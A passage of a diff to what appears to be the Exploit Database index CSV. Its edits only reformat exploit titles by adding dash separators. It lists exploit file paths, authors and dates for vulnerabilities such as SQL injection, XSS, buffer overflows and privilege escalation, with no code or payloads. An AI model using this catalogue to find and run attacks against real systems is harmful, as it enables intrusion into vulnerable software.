Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 @@ -30488,7 +30483,7 @@ id,file,description,date,author,platform,type,port 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS - 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",windows,remote,0 -33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,Metasploit,windows,remote,0 +33880,platforms/windows/remote/33880.rb,"Cogent DataHub - Command Injection",2014-06-25,Metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 @@ -30551,16 +30546,16 @@ id,file,description,date,author,platform,type,port 33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0 33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",multiple,remote,0 33906,platforms/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0 -33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote,0 +33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' - Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection",2010-04-29,Sid3^effects,php,webapps,0 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'username' Parameter SQL Injection",2010-04-28,"John Leitch",php,webapps,0 33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection",2010-05-07,Liscker,php,webapps,0 33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0 33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0 -33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0 +33963,platforms/linux/local/33963.txt,"gdomap - Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial Of Service",2010-05-10,"Usman Saeed",windows,dos,0 33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps,0 @@ -30588,7 +30583,7 @@ id,file,description,date,author,platform,type,port 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta ",asp,webapps,0 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 - 'index.php' Cross-Site Scripting",2010-02-09,zx,php,webapps,0 -33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 +33934,platforms/php/webapps/33934.txt,"eZoneScripts - Multiple Scripts Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,"cr4wl3r ",php,webapps,0 @@ -30601,7 +30596,7 @@ id,file,description,date,author,platform,type,port 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 33944,platforms/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,windows,remote,0 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 -33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 +33946,platforms/php/webapps/33946.txt,"EmiratesHost - Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 33947,platforms/php/webapps/33947.txt,"Last Wizardz - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps,0 33949,platforms/linux/remote/33949.txt,"PCRE 6.2 Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",linux,remote,0 @@ -30620,14 +30615,14 @@ id,file,description,date,author,platform,type,port 33982,platforms/php/webapps/33982.txt,"NPDS Revolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 -33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload",2010-01-03,indoushka,php,webapps,0 +33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Remote File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 -33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 +33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 @@ -30649,7 +30644,7 @@ id,file,description,date,author,platform,type,port 34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 -34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 +34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 @@ -30657,7 +30652,7 @@ id,file,description,date,author,platform,type,port 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass PoC",2014-07-10,EccE,linux,remote,0 -34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 +34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injection",2010-05-21,epixoip,php,webapps,0 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 @@ -30687,11 +30682,11 @@ id,file,description,date,author,platform,type,port 34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0 34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0 34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0 -34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 +34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 34063,platforms/hardware/remote/34063.rb,"D-Link - info.cgi POST Request Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 -34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 +34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 @@ -30707,7 +30702,7 @@ id,file,description,date,author,platform,type,port 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 -34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 +34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,php,webapps,0 34079,platforms/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting",2010-01-06,Sora,php,webapps,0 34080,platforms/cgi/webapps/34080.txt,"MoinMoin 1.x - 'PageEditor.py' Cross-Site Scripting",2010-06-03,anonymous,cgi,webapps,0 @@ -30730,7 +30725,7 @@ id,file,description,date,author,platform,type,port 34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 -34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 +34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Parameter Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 @@ -30740,7 +30735,7 @@ id,file,description,date,author,platform,type,port 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 -34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF / Stored XSS",2014-07-17,LiquidWorm,php,webapps,80 34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps,0 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 @@ -30769,7 +30764,7 @@ id,file,description,date,author,platform,type,port 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 -34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 +34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 @@ -30805,7 +30800,7 @@ id,file,description,date,author,platform,type,port 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote,0 +34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response - HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote,0 34201,platforms/linux/remote/34201.txt,"feh 1.7 - '--wget-timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF / Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 @@ -30850,7 +30845,7 @@ id,file,description,date,author,platform,type,port 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 -34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,Metasploit,linux,remote,443 +34362,platforms/linux/remote/34362.rb,"Gitlab-shell - Code Execution",2014-08-19,Metasploit,linux,remote,443 34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 - (data.php) Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0 @@ -30876,7 +30871,7 @@ id,file,description,date,author,platform,type,port 34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0 -34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote,0 +34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine - 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0 @@ -30902,7 +30897,7 @@ id,file,description,date,author,platform,type,port 34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 -34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0 +34297,platforms/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0 34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0 34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 @@ -30916,8 +30911,8 @@ id,file,description,date,author,platform,type,port 34309,platforms/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Local Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos,0 34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,multiple,remote,0 34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",solaris,local,0 -34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 Encoded URL Remote",2010-07-13,"Timothy D. Morgan",multiple,remote,0 -34313,platforms/solaris/local/34313.txt,"Oracle Solaris 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 +34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 - Encoded URL Remote",2010-07-13,"Timothy D. Morgan",multiple,remote,0 +34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding - 'searchform.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting",2010-06-09,"Richard Brain",hardware,remote,0 @@ -30958,7 +30953,7 @@ id,file,description,date,author,platform,type,port 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 -34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 +34369,platforms/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 @@ -30966,7 +30961,7 @@ id,file,description,date,author,platform,type,port 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0 -34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0 +34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0 34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 - 'searchadvance.asp' Cross-Site Scripting",2009-12-22,"Andrea Bocchetti",asp,webapps,0 34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0 @@ -30978,12 +30973,12 @@ id,file,description,date,author,platform,type,port 34386,platforms/php/webapps/34386.txt,"Cetera eCommerce - Multiple SQL Injection",2010-07-28,MustLive,php,webapps,0 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 -34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 +34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 -34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 +34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel 